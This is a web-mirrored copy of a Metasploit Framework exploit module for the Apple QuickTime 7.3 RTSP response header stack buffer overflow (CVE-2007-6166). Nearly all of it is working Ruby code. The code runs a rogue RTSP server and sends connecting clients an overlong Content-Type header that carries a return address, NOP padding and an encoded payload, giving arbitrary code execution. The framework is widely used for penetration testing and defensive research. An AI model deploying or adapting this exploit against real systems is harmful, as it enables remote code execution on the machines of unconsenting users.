Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/misc/apple_quicktime_rtsp_response.rb
19669 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = NormalRanking
8
9
include Msf::Exploit::Remote::TcpServer
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Apple QuickTime 7.3 RTSP Response Header Buffer Overflow',
16
'Description' => %q{
17
This module exploits a stack buffer overflow in Apple QuickTime 7.3. By sending an overly long
18
RTSP response to a client, an attacker may be able to execute arbitrary code.
19
},
20
'Author' => 'MC',
21
'License' => MSF_LICENSE,
22
'References' => [
23
[ 'CVE', '2007-6166' ],
24
[ 'OSVDB', '40876' ],
25
[ 'BID', '26549' ],
26
[ 'EDB', '4648' ],
27
],
28
'DefaultOptions' => {
29
'EXITFUNC' => 'process',
30
},
31
'Payload' => {
32
'Space' => 700,
33
'BadChars' => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
34
'MaxNops' => 0,
35
'StackAdjustment' => -3500,
36
},
37
'Platform' => 'win',
38
'Targets' => [
39
[ 'QuickTime 7.3, QuickTime Player 7.3', { 'Offset' => 991, 'Ret' => 0x67644297 } ], # pop esi; pop ebx; ret / QuickTimeStreaming.qtx (7.3.0.70)
40
],
41
'Privileged' => false,
42
'DisclosureDate' => '2007-11-23',
43
'DefaultTarget' => 0,
44
'Notes' => {
45
'Reliability' => UNKNOWN_RELIABILITY,
46
'Stability' => UNKNOWN_STABILITY,
47
'SideEffects' => UNKNOWN_SIDE_EFFECTS
48
}
49
)
50
)
51
52
register_options(
53
[
54
OptPort.new('SRVPORT', [ true, "The RTSP daemon port to listen on", 554 ])
55
]
56
)
57
end
58
59
def on_client_connect(client)
60
return if ((p = regenerate_payload(client)) == nil)
61
62
client.get_once
63
64
buffer = rand_text_english(target['Offset']) + Rex::Arch::X86.jmp_short(6) + make_nops(2)
65
buffer << [target.ret].pack('V') + payload.encoded + rand_text_english(4092 - payload.encoded.length)
66
67
strname = rand_text_alpha(rand(75) + 1)
68
date = Time.now
69
num = rand(1).to_s
70
71
header = "RTSP/1.0 200 OK\r\n"
72
header << "CSeq: 1\r\n"
73
header << "Date: #{date}\r\n"
74
header << "Content-Base: rtsp://0.0.0.0/#{strname}\r\n"
75
header << "Content-Type: #{buffer}\r\n"
76
header << "Content-Length: #{strname.length}\r\n\r\n"
77
78
body = "v=#{num}\r\n"
79
body << "o=#{strname}\r\n"
80
body << "s=#{strname}\r\n"
81
body << "i=#{strname}\r\n"
82
body << "t=#{num}\r\n"
83
body << "a=tool:#{strname}\r\n"
84
body << "a=type:#{strname}\r\n"
85
body << "a=control:#{strname}\r\n"
86
body << "a=range:#{strname}\r\n"
87
body << "a=x-qt-text-nam:#{strname}\r\n"
88
body << "a=x-qt-text-inf:#{strname}\r\n"
89
body << "m=#{strname}\r\n"
90
body << "c=#{strname}\r\n"
91
body << "a=control:#{strname}\r\n"
92
93
sploit = header + body
94
95
print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")
96
97
client.put(sploit)
98
handler(client)
99
100
service.close_client(client)
101
end
102
end
103
104